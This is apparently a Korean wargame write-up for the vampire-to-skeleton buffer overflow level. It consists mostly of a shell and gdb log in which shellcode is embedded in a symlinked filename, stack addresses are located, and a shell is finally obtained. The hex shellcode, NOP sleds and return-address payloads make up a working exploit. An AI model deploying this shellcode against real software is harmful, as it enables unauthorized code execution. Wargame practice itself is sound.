vampire->skeleton

2014. 2. 25. 03:41

헠헠헠헠허커헣컿ㅋ헠ㅎ

내가 몇달동안 삽질하다가 아씨 나는 재능이업나보다 할 정도으 ㅣ문제였느데!!!!!!!!!!!!!!!!!

으헝ㄹㅁㄴㅇ럼ㄴ임ㄴㅇㄹ!!!!!!!!!!!!

풀렸쪙!!!!!!!!!!!!!!!

ㅇ름ㄴㄴㄹㄹㄹㄹㅁㄴㅇㄹ

[vampire@localhost vampire]$ ln -s ./ssssssss `perl -e 'print "\x90"x40, "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\xf\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\xf\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

argv error

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

Segmentation fault (core dumped)

[vampire@localhost vampire]$ gdb -q `perl -e 'print "\x90"x40, "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\xf\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` core

warning: core file may not match specified executable file.

Core was generated by ` '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbfffffe0 in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048506

(gdb) r

Starting program: /home/vampire/?????????????????????????????????????????^12l?u楕凹2핽i00tii0jo??T??

귁?

Breakpoint 1, 0x8048506 in main ()

(gdb) x/10x 0xbfffffcd

0xbfffffcd: 0x315e11eb 0x8032b1c9 0x80010f6c 0xf67501e9

0xbfffffdd: 0xeae805eb 0x32ffffff 0x306951c1 0x69697430

0xbfffffed: 0x8a6f6a30 0x8a5451e4

(gdb) x/10x 0xbfffffcc

0xbfffffcc: 0x5e11eb90 0x32b1c931 0x010f6c80 0x7501e980

0xbfffffdc: 0xe805ebf6 0xffffffea 0x6951c132 0x69743030

0xbfffffec: 0x6f6a3069 0x5451e48a

(gdb) q

The program is running. Exit anyway? (y or n) y

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

Segmentation fault (core dumped)

[vampire@localhost vampire]$ ln -s ./ssssssss `perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

argv error

stack is still your friend.

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

Segmentation fault (core dumped)

[vampire@localhost vampire]$ gdb -q ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` core

warning: core file may not match specified executable file.

Core was generated by ` '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbfffffcd in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048506

(gdb) r

Starting program: /home/vampire/./h?須?h

켚Thjo??i0chi0tijY

?y?投T?

Breakpoint 1, 0x8048506 in main ()

(gdb) x/10wx 4esp

Invalid number "4esp".

(gdb) x/10wx $esp

0xbffffa88: 0x080482d0 0x40021ca0 0xbffffab8 0x4000a970

0xbffffa98: 0x400f855b 0x08049734 0x4000ae60 0xbffffb04

0xbffffaa8: 0xbffffab8 0x080484eb

(gdb) x/40wx $esp

0xbffffa88: 0x080482d0 0x40021ca0 0xbffffab8 0x4000a970

0xbffffa98: 0x400f855b 0x08049734 0x4000ae60 0xbffffb04

0xbffffaa8: 0xbffffab8 0x080484eb 0x08049720 0x08049734

0xbffffab8: 0xbffffad8 0x400309cb 0x00000001 0xbffffb04

0xbffffac8: 0xbffffb0c 0x40013868 0x00000001 0x08048450

0xbffffad8: 0x00000000 0x08048471 0x08048500 0x00000001

0xbffffae8: 0xbffffb04 0x08048390 0x080486ac 0x4000ae60

0xbffffaf8: 0xbffffafc 0x40013e90 0x00000001 0xbffffbf9

0xbffffb08: 0x00000000 0xbffffc31 0xbffffc53 0xbffffc5d

0xbffffb18: 0xbffffc6b 0xbffffc8a 0xbffffc9a 0xbffffcb4

(gdb)

0xbffffb28: 0xbffffcd1 0xbffffcf0 0xbffffcfb 0xbffffd09

0xbffffb38: 0xbffffd4c 0xbffffd5f 0xbffffd74 0xbffffd84

0xbffffb48: 0xbffffd91 0xbffffdb0 0xbffffdcb 0xbffffdd6

0xbffffb58: 0xbffffde7 0xbffffdf9 0xbffffe01 0x00000000

0xbffffb68: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffb78: 0x00000005 0x00000006 0x00000006 0x00001000

0xbffffb88: 0x00000007 0x40000000 0x00000008 0x00000000

0xbffffb98: 0x00000009 0x08048450 0x0000000b 0x000001fd

0xbffffba8: 0x0000000c 0x000001fd 0x0000000d 0x000001fd

0xbffffbb8: 0x0000000e 0x000001fd 0x00000010 0x0fabfbff

(gdb)

0xbffffbc8: 0x0000000f 0xbffffbf4 0x00000000 0x00000000

0xbffffbd8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbe8: 0x00000000 0x00000000 0x00000000 0x36383669

0xbffffbf8: 0x6f682f00 0x762f656d 0x69706d61 0x2e2f6572

0xbffffc08: 0xe28a682f 0xb16881ce 0x6854530c 0xe48a6f6a

0xbffffc18: 0x30690168 0x30696863 0x146a6974 0x0c0cfe59

0xbffffc28: 0x41fa7949 0xc354e1f7 0x53454c00 0x45504f53

0xbffffc38: 0x2f7c3d4e 0x2f727375 0x2f6e6962 0x7373656c

0xbffffc48: 0x65706970 0x2068732e 0x55007325 0x4e524553

0xbffffc58: 0x3d454d41 0x53494800 0x5a495354 0x30313d45

(gdb)

0xbffffc68: 0x48003030 0x4e54534f 0x3d454d41 0x61636f6c

0xbffffc78: 0x736f686c 0x6f6c2e74 0x646c6163 0x69616d6f

0xbffffc88: 0x4f4c006e 0x4d414e47 0x61763d45 0x7269706d

0xbffffc98: 0x45520065 0x45544f4d 0x54534f48 0x3239313d

0xbffffca8: 0x3836312e 0x2e30312e 0x00313431 0x4c49414d

0xbffffcb8: 0x61762f3d 0x70732f72 0x2f6c6f6f 0x6c69616d

0xbffffcc8: 0x6d61762f 0x65726970 0x43414d00 0x50595448

0xbffffcd8: 0x33693d45 0x722d3638 0x61686465 0x696c2d74

0xbffffce8: 0x2d78756e 0x00756e67 0x4d524554 0x6574783d

0xbffffcf8: 0x48006d72 0x5454534f 0x3d455059 0x36383369

(gdb)

0xbffffd08: 0x54415000 0x752f3d48 0x6c2f7273 0x6c61636f

0xbffffd18: 0x6e69622f 0x69622f3a 0x752f3a6e 0x622f7273

0xbffffd28: 0x2f3a6e69 0x2f727375 0x52313158 0x69622f36

0xbffffd38: 0x682f3a6e 0x2f656d6f 0x706d6176 0x2f657269

0xbffffd48: 0x006e6962 0x454d4f48 0x6f682f3d 0x762f656d

0xbffffd58: 0x69706d61 0x49006572 0x5455504e 0x2f3d4352

0xbffffd68: 0x2f637465 0x75706e69 0x00637274 0x4c454853

0xbffffd78: 0x622f3d4c 0x622f6e69 0x00687361 0x52455355

0xbffffd88: 0x6d61763d 0x65726970 0x53414200 0x4e455f48

0xbffffd98: 0x682f3d56 0x2f656d6f 0x706d6176 0x2f657269

(gdb)

0xbffffda8: 0x7361622e 0x00637268 0x50534944 0x3d59414c

0xbffffdb8: 0x2e323931 0x2e383631 0x312e3031 0x303a3134

0xbffffdc8: 0x4c00302e 0x3d474e41 0x555f6e65 0x534f0053

0xbffffdd8: 0x45505954 0x6e696c3d 0x672d7875 0x5000756e

0xbffffde8: 0x2f3d4457 0x656d6f68 0x6d61762f 0x65726970

0xbffffdf8: 0x4c485300 0x323d4c56 0x5f534c00 0x4f4c4f43

0xbffffe08: 0x6e3d5352 0x30303d6f 0x3d69663a 0x643a3030

0xbffffe18: 0x31303d69 0x3a34333b 0x303d6e6c 0x36333b31

0xbffffe28: 0x3d69703a 0x333b3034 0x6f733a33 0x3b31303d

0xbffffe38: 0x623a3533 0x30343d64 0x3b33333b 0x633a3130

(gdb)

0xbffffe48: 0x30343d64 0x3b33333b 0x6f3a3130 0x31303d72

0xbffffe58: 0x3b35303b 0x343b3733 0x696d3a31 0x3b31303d

0xbffffe68: 0x333b3530 0x31343b37 0x3d78653a 0x333b3130

0xbffffe78: 0x2e2a3a32 0x3d646d63 0x333b3130 0x2e2a3a32

0xbffffe88: 0x3d657865 0x333b3130 0x2e2a3a32 0x3d6d6f63

0xbffffe98: 0x333b3130 0x2e2a3a32 0x3d6d7462 0x333b3130

0xbffffea8: 0x2e2a3a32 0x3d746162 0x333b3130 0x2e2a3a32

0xbffffeb8: 0x303d6873 0x32333b31 0x632e2a3a 0x303d6873

0xbffffec8: 0x32333b31 0x742e2a3a 0x303d7261 0x31333b31

0xbffffed8: 0x742e2a3a 0x303d7a67 0x31333b31 0x612e2a3a

(gdb)

0xbffffee8: 0x303d6a72 0x31333b31 0x742e2a3a 0x303d7a61

0xbffffef8: 0x31333b31 0x6c2e2a3a 0x303d687a 0x31333b31

0xbfffff08: 0x7a2e2a3a 0x303d7069 0x31333b31 0x7a2e2a3a

0xbfffff18: 0x3b31303d 0x2a3a3133 0x303d5a2e 0x31333b31

0xbfffff28: 0x672e2a3a 0x31303d7a 0x3a31333b 0x7a622e2a

0xbfffff38: 0x31303d32 0x3a31333b 0x7a622e2a 0x3b31303d

0xbfffff48: 0x2a3a3133 0x3d7a742e 0x333b3130 0x2e2a3a31

0xbfffff58: 0x3d6d7072 0x333b3130 0x2e2a3a31 0x6f697063

0xbfffff68: 0x3b31303d 0x2a3a3133 0x67706a2e 0x3b31303d

0xbfffff78: 0x2a3a3533 0x6669672e 0x3b31303d 0x2a3a3533

(gdb)

0xbfffff88: 0x706d622e 0x3b31303d 0x2a3a3533 0x6d62782e

0xbfffff98: 0x3b31303d 0x2a3a3533 0x6d70782e 0x3b31303d

0xbfffffa8: 0x2a3a3533 0x676e702e 0x3b31303d 0x2a3a3533

0xbfffffb8: 0x6669742e 0x3b31303d 0x003a3533 0x6d6f682f

0xbfffffc8: 0x61762f65 0x7269706d 0x2f2e2f65 0xcee28a68

0xbfffffd8: 0x0cb16881 0x6a685453 0x68e48a6f 0x63306901

0xbfffffe8: 0x74306968 0x59146a69 0x490c0cfe 0xf741fa79

0xbffffff8: 0x00c354e1 0x00000000 Cannot access memory at address 0xc0000000

(gdb) x/40x $esp

0xbffffa88: 0x080482d0 0x40021ca0 0xbffffab8 0x4000a970

0xbffffa98: 0x400f855b 0x08049734 0x4000ae60 0xbffffb04

0xbffffaa8: 0xbffffab8 0x080484eb 0x08049720 0x08049734

0xbffffab8: 0xbffffad8 0x400309cb 0x00000001 0xbffffb04

0xbffffac8: 0xbffffb0c 0x40013868 0x00000001 0x08048450

0xbffffad8: 0x00000000 0x08048471 0x08048500 0x00000001

0xbffffae8: 0xbffffb04 0x08048390 0x080486ac 0x4000ae60

0xbffffaf8: 0xbffffafc 0x40013e90 0x00000001 0xbffffbf9

0xbffffb08: 0x00000000 0xbffffc31 0xbffffc53 0xbffffc5d

0xbffffb18: 0xbffffc6b 0xbffffc8a 0xbffffc9a 0xbffffcb4

(gdb)

0xbffffb28: 0xbffffcd1 0xbffffcf0 0xbffffcfb 0xbffffd09

0xbffffb38: 0xbffffd4c 0xbffffd5f 0xbffffd74 0xbffffd84

0xbffffb48: 0xbffffd91 0xbffffdb0 0xbffffdcb 0xbffffdd6

0xbffffb58: 0xbffffde7 0xbffffdf9 0xbffffe01 0x00000000

0xbffffb68: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffb78: 0x00000005 0x00000006 0x00000006 0x00001000

0xbffffb88: 0x00000007 0x40000000 0x00000008 0x00000000

0xbffffb98: 0x00000009 0x08048450 0x0000000b 0x000001fd

0xbffffba8: 0x0000000c 0x000001fd 0x0000000d 0x000001fd

0xbffffbb8: 0x0000000e 0x000001fd 0x00000010 0x0fabfbff

(gdb)

0xbffffbc8: 0x0000000f 0xbffffbf4 0x00000000 0x00000000

0xbffffbd8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbe8: 0x00000000 0x00000000 0x00000000 0x36383669

0xbffffbf8: 0x6f682f00 0x762f656d 0x69706d61 0x2e2f6572

0xbffffc08: 0xe28a682f 0xb16881ce 0x6854530c 0xe48a6f6a

0xbffffc18: 0x30690168 0x30696863 0x146a6974 0x0c0cfe59

0xbffffc28: 0x41fa7949 0xc354e1f7 0x53454c00 0x45504f53

0xbffffc38: 0x2f7c3d4e 0x2f727375 0x2f6e6962 0x7373656c

0xbffffc48: 0x65706970 0x2068732e 0x55007325 0x4e524553

0xbffffc58: 0x3d454d41 0x53494800 0x5a495354 0x30313d45

(gdb)

0xbffffc68: 0x48003030 0x4e54534f 0x3d454d41 0x61636f6c

0xbffffc78: 0x736f686c 0x6f6c2e74 0x646c6163 0x69616d6f

0xbffffc88: 0x4f4c006e 0x4d414e47 0x61763d45 0x7269706d

0xbffffc98: 0x45520065 0x45544f4d 0x54534f48 0x3239313d

0xbffffca8: 0x3836312e 0x2e30312e 0x00313431 0x4c49414d

0xbffffcb8: 0x61762f3d 0x70732f72 0x2f6c6f6f 0x6c69616d

0xbffffcc8: 0x6d61762f 0x65726970 0x43414d00 0x50595448

0xbffffcd8: 0x33693d45 0x722d3638 0x61686465 0x696c2d74

0xbffffce8: 0x2d78756e 0x00756e67 0x4d524554 0x6574783d

0xbffffcf8: 0x48006d72 0x5454534f 0x3d455059 0x36383369

(gdb)

0xbffffd08: 0x54415000 0x752f3d48 0x6c2f7273 0x6c61636f

0xbffffd18: 0x6e69622f 0x69622f3a 0x752f3a6e 0x622f7273

0xbffffd28: 0x2f3a6e69 0x2f727375 0x52313158 0x69622f36

0xbffffd38: 0x682f3a6e 0x2f656d6f 0x706d6176 0x2f657269

0xbffffd48: 0x006e6962 0x454d4f48 0x6f682f3d 0x762f656d

0xbffffd58: 0x69706d61 0x49006572 0x5455504e 0x2f3d4352

0xbffffd68: 0x2f637465 0x75706e69 0x00637274 0x4c454853

0xbffffd78: 0x622f3d4c 0x622f6e69 0x00687361 0x52455355

0xbffffd88: 0x6d61763d 0x65726970 0x53414200 0x4e455f48

0xbffffd98: 0x682f3d56 0x2f656d6f 0x706d6176 0x2f657269

(gdb)

0xbffffda8: 0x7361622e 0x00637268 0x50534944 0x3d59414c

0xbffffdb8: 0x2e323931 0x2e383631 0x312e3031 0x303a3134

0xbffffdc8: 0x4c00302e 0x3d474e41 0x555f6e65 0x534f0053

0xbffffdd8: 0x45505954 0x6e696c3d 0x672d7875 0x5000756e

0xbffffde8: 0x2f3d4457 0x656d6f68 0x6d61762f 0x65726970

0xbffffdf8: 0x4c485300 0x323d4c56 0x5f534c00 0x4f4c4f43

0xbffffe08: 0x6e3d5352 0x30303d6f 0x3d69663a 0x643a3030

0xbffffe18: 0x31303d69 0x3a34333b 0x303d6e6c 0x36333b31

0xbffffe28: 0x3d69703a 0x333b3034 0x6f733a33 0x3b31303d

0xbffffe38: 0x623a3533 0x30343d64 0x3b33333b 0x633a3130

(gdb)

0xbffffe48: 0x30343d64 0x3b33333b 0x6f3a3130 0x31303d72

0xbffffe58: 0x3b35303b 0x343b3733 0x696d3a31 0x3b31303d

0xbffffe68: 0x333b3530 0x31343b37 0x3d78653a 0x333b3130

0xbffffe78: 0x2e2a3a32 0x3d646d63 0x333b3130 0x2e2a3a32

0xbffffe88: 0x3d657865 0x333b3130 0x2e2a3a32 0x3d6d6f63

0xbffffe98: 0x333b3130 0x2e2a3a32 0x3d6d7462 0x333b3130

0xbffffea8: 0x2e2a3a32 0x3d746162 0x333b3130 0x2e2a3a32

0xbffffeb8: 0x303d6873 0x32333b31 0x632e2a3a 0x303d6873

0xbffffec8: 0x32333b31 0x742e2a3a 0x303d7261 0x31333b31

0xbffffed8: 0x742e2a3a 0x303d7a67 0x31333b31 0x612e2a3a

(gdb)

0xbffffee8: 0x303d6a72 0x31333b31 0x742e2a3a 0x303d7a61

0xbffffef8: 0x31333b31 0x6c2e2a3a 0x303d687a 0x31333b31

0xbfffff08: 0x7a2e2a3a 0x303d7069 0x31333b31 0x7a2e2a3a

0xbfffff18: 0x3b31303d 0x2a3a3133 0x303d5a2e 0x31333b31

0xbfffff28: 0x672e2a3a 0x31303d7a 0x3a31333b 0x7a622e2a

0xbfffff38: 0x31303d32 0x3a31333b 0x7a622e2a 0x3b31303d

0xbfffff48: 0x2a3a3133 0x3d7a742e 0x333b3130 0x2e2a3a31

0xbfffff58: 0x3d6d7072 0x333b3130 0x2e2a3a31 0x6f697063

0xbfffff68: 0x3b31303d 0x2a3a3133 0x67706a2e 0x3b31303d

0xbfffff78: 0x2a3a3533 0x6669672e 0x3b31303d 0x2a3a3533

(gdb)

0xbfffff88: 0x706d622e 0x3b31303d 0x2a3a3533 0x6d62782e

0xbfffff98: 0x3b31303d 0x2a3a3533 0x6d70782e 0x3b31303d

0xbfffffa8: 0x2a3a3533 0x676e702e 0x3b31303d 0x2a3a3533

0xbfffffb8: 0x6669742e 0x3b31303d 0x003a3533 0x6d6f682f

0xbfffffc8: 0x61762f65 0x7269706d 0x2f2e2f65 0xcee28a68

0xbfffffd8: 0x0cb16881 0x6a685453 0x68e48a6f 0x63306901

0xbfffffe8: 0x74306968 0x59146a69 0x490c0cfe 0xf741fa79

0xbffffff8: 0x00c354e1 0x00000000 Cannot access memory at address 0xc0000000

(gdb)

0xc0000004: Cannot access memory at address 0xc0000004

(gdb) x/10s $esp

0xbffffa88: "?202\004\b?\034\002@뫄퓈?

0xbffffa97: "@[\205\017@4\227\004\b`?

0xbffffaa3: "@\004?옇?용\204\004\b \227\004\b4\227\004\b綿옹\t\003@\001"

0xbffffac2: ""

0xbffffac3: ""

0xbffffac4: "\004??f?퓀8\001@\001"

0xbffffad2: ""

0xbffffad3: ""

0xbffffad4: "P\204\004\b"

0xbffffad9: ""

(gdb)

0xbffffada: ""

0xbffffadb: ""

0xbffffadc: "q\204\004\b"

0xbffffae1: "\205\004\b\001"

0xbffffae6: ""

0xbffffae7: ""

0xbffffae8: "\004??220\203\004\b?206\004\b`?

0xbffffaf7: "@斅?220>\001@\001"

0xbffffb02: ""

0xbffffb03: ""

(gdb)

0xbffffb04: "港?

0xbffffb09: ""

0xbffffb0a: ""

0xbffffb0b: ""

0xbffffb0c: "1?풱???퓃??212??232?였?왐?욹?웝??t?풪???퓍??204??221?염?옹?왜?욜?월??001??

0xbffffb65: ""

0xbffffb66: ""

0xbffffb67: ""

0xbffffb68: "\003"

0xbffffb6a: ""

(gdb)

0xbffffb6b: ""

0xbffffb6c: "4\200\004\b\004"

0xbffffb72: ""

0xbffffb73: ""

0xbffffb74: " "

0xbffffb76: ""

0xbffffb77: ""

0xbffffb78: "\005"

0xbffffb7a: ""

0xbffffb7b: ""

(gdb)

0xbffffb7c: "\006"

0xbffffb7e: ""

0xbffffb7f: ""

0xbffffb80: "\006"

0xbffffb82: ""

0xbffffb83: ""

0xbffffb84: ""

0xbffffb85: "\020"

0xbffffb87: ""

0xbffffb88: "\a"

(gdb)

0xbffffb8a: ""

0xbffffb8b: ""

0xbffffb8c: ""

0xbffffb8d: ""

0xbffffb8e: ""

0xbffffb8f: "@\b"

0xbffffb92: ""

0xbffffb93: ""

0xbffffb94: ""

0xbffffb95: ""

(gdb)

0xbffffb96: ""

0xbffffb97: ""

0xbffffb98: "\t"

0xbffffb9a: ""

0xbffffb9b: ""

0xbffffb9c: "P\204\004\b\013"

0xbffffba2: ""

0xbffffba3: ""

0xbffffba4: "?001"

0xbffffba7: ""

(gdb)

0xbffffba8: "\f"

0xbffffbaa: ""

0xbffffbab: ""

0xbffffbac: "?001"

0xbffffbaf: ""

0xbffffbb0: "\r"

0xbffffbb2: ""

0xbffffbb3: ""

0xbffffbb4: "?001"

0xbffffbb7: ""

(gdb)

0xbffffbb8: "\016"

0xbffffbba: ""

0xbffffbbb: ""

0xbffffbbc: "?001"

0xbffffbbf: ""

0xbffffbc0: "\020"

0xbffffbc2: ""

0xbffffbc3: ""

0xbffffbc4: "螢\017\017"

0xbffffbca: ""

(gdb)

0xbffffbcb: ""

0xbffffbcc: "憔?

0xbffffbd1: ""

0xbffffbd2: ""

0xbffffbd3: ""

0xbffffbd4: ""

0xbffffbd5: ""

0xbffffbd6: ""

0xbffffbd7: ""

0xbffffbd8: ""

(gdb)

0xbffffbd9: ""

0xbffffbda: ""

0xbffffbdb: ""

0xbffffbdc: ""

0xbffffbdd: ""

0xbffffbde: ""

0xbffffbdf: ""

0xbffffbe0: ""

0xbffffbe1: ""

0xbffffbe2: ""

(gdb)

0xbffffbe3: ""

0xbffffbe4: ""

0xbffffbe5: ""

0xbffffbe6: ""

0xbffffbe7: ""

0xbffffbe8: ""

0xbffffbe9: ""

0xbffffbea: ""

0xbffffbeb: ""

0xbffffbec: ""

(gdb)

0xbffffbed: ""

0xbffffbee: ""

0xbffffbef: ""

0xbffffbf0: ""

0xbffffbf1: ""

0xbffffbf2: ""

0xbffffbf3: ""

0xbffffbf4: "i686"

0xbffffbf9: "/home/vampire/./h\212須\201h?fSThjo\212?\001i0chi0tij\024Y?f\fIy?投T?

0xbffffc31: "LESSOPEN=|/usr/bin/lesspipe.sh %s"

(gdb)

0xbffffc53: "USERNAME="

0xbffffc5d: "HISTSIZE=1000"

0xbffffc6b: "HOSTNAME=localhost.localdomain"

0xbffffc8a: "LOGNAME=vampire"

0xbffffc9a: "REMOTEHOST=192.168.10.141"

0xbffffcb4: "MAIL=/var/spool/mail/vampire"

0xbffffcd1: "MACHTYPE=i386-redhat-linux-gnu"

0xbffffcf0: "TERM=xterm"

0xbffffcfb: "HOSTTYPE=i386"

0xbffffd09: "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/vampire/bin"

(gdb)

0xbffffd4c: "HOME=/home/vampire"

0xbffffd5f: "INPUTRC=/etc/inputrc"

0xbffffd74: "SHELL=/bin/bash"

0xbffffd84: "USER=vampire"

0xbffffd91: "BASH_ENV=/home/vampire/.bashrc"

0xbffffdb0: "DISPLAY=192.168.10.141:0.0"

0xbffffdcb: "LANG=en_US"

0xbffffdd6: "OSTYPE=linux-gnu"

0xbffffde7: "PWD=/home/vampire"

0xbffffdf9: "SHLVL=2"

(gdb)

0xbffffe01: "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...

0xbffffec9: ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...

0xbfffff91: "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"

0xbfffffc4: "/home/vampire/./h\212須\201h?fSThjo\212?\001i0chi0tij\024Y?f\fIy?投T?

0xbffffffc: ""

0xbffffffd: ""

0xbffffffe: ""

0xbfffffff: ""

0xc0000000: <Address 0xc0000000 out of bounds>

(gdb) x/x 0xbfffffc4

0xbfffffc4: 0x6d6f682f

(gdb) x/10x 0xbfffffc4

0xbfffffc4: 0x6d6f682f 0x61762f65 0x7269706d 0x2f2e2f65

0xbfffffd4: 0xcee28a68 0x0cb16881 0x6a685453 0x68e48a6f

0xbfffffe4: 0x63306901 0x74306968

(gdb) x/10x 0xbfffffc3

0xbfffffc3: 0x6f682f00 0x762f656d 0x69706d61 0x2e2f6572

0xbfffffd3: 0xe28a682f 0xb16881ce 0x6854530c 0xe48a6f6a

0xbfffffe3: 0x30690168 0x30696863

(gdb) x/10x 0xbfffffc1

0xbfffffc1: 0x2f003a35 0x656d6f68 0x6d61762f 0x65726970

0xbfffffd1: 0x682f2e2f 0x81cee28a 0x530cb168 0x6f6a6854

0xbfffffe1: 0x0168e48a 0x68633069

(gdb) q

The program is running. Exit anyway? (y or n) y

[vampire@localhost vampire]$ clear

[vampire@localhost vampire]$ rm rf *

rm: cannot remove `rf': No such file or directory

rm: j

X?Rh: is a directory

rm: remove write-protected file `skeleton'? y^Hn

rm: remove write-protected file `skeleton.c'? n

[vampire@localhost vampire]$ ls

j?X?Rh skeleton.c

[vampire@localhost vampire]$ oh shit

bash2: oh: command not found

[vampire@localhost vampire]$ gcc skeleton.c -o skeleton

[vampire@localhost vampire]$ ln -s ./ssssssss `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x48'`

bash2: ./????????????????????????????????????????h?須?h

SThjo??i0chi0tijY

Iy?投T? No such file or directory

[vampire@localhost vampire]$ cp skeleton ssssssss

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜

Segmentation fault (core dumped)

[vampire@localhost vampire]$ gdb `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` core

GNU gdb 19991004

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB. Type "show warranty" for details.

This GDB was configured as "i386-redhat-linux"...

warning: core file may not match specified executable file.

Core was generated by ` '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbfbfbfbf in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048506

(gdb) r

Starting program: /home/vampire/????????????????????????????????????????h?須?h

켚Thjo??i0chi0tijY

?y?投T?

Breakpoint 1, 0x8048506 in main ()

(gdb) x/10x 0xbfffffcd

0xbfffffcd: 0x90909090 0x68909090 0x81cee28a 0x530cb168

0xbfffffdd: 0x6f6a6854 0x0168e48a 0x68633069 0x69743069

0xbfffffed: 0xfe59146a 0x79490c0c

(gdb) x/10x 0xbfffffd2

0xbfffffd2: 0x8a689090 0x6881cee2 0x54530cb1 0x8a6f6a68

0xbfffffe2: 0x690168e4 0x69686330 0x6a697430 0x0cfe5914

0xbffffff2: 0xfa79490c 0x54e1f741

(gdb) x/10x 0xbfffffd4

0xbfffffd4: 0xcee28a68 0x0cb16881 0x6a685453 0x68e48a6f

0xbfffffe4: 0x63306901 0x74306968 0x59146a69 0x490c0cfe

0xbffffff4: 0xf741fa79 0x00c354e1

(gdb) q

The program is running. Exit anyway? (y or n) y

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

bash$ hell yes

sh: hell: command not found

bash$ exit

exit

[vampire@localhost vampire]$ rm ./ssssssss `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ln -s ./skeleton `perl -e 'print "\x90"x40, "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜

Segmentation fault (core dumped)

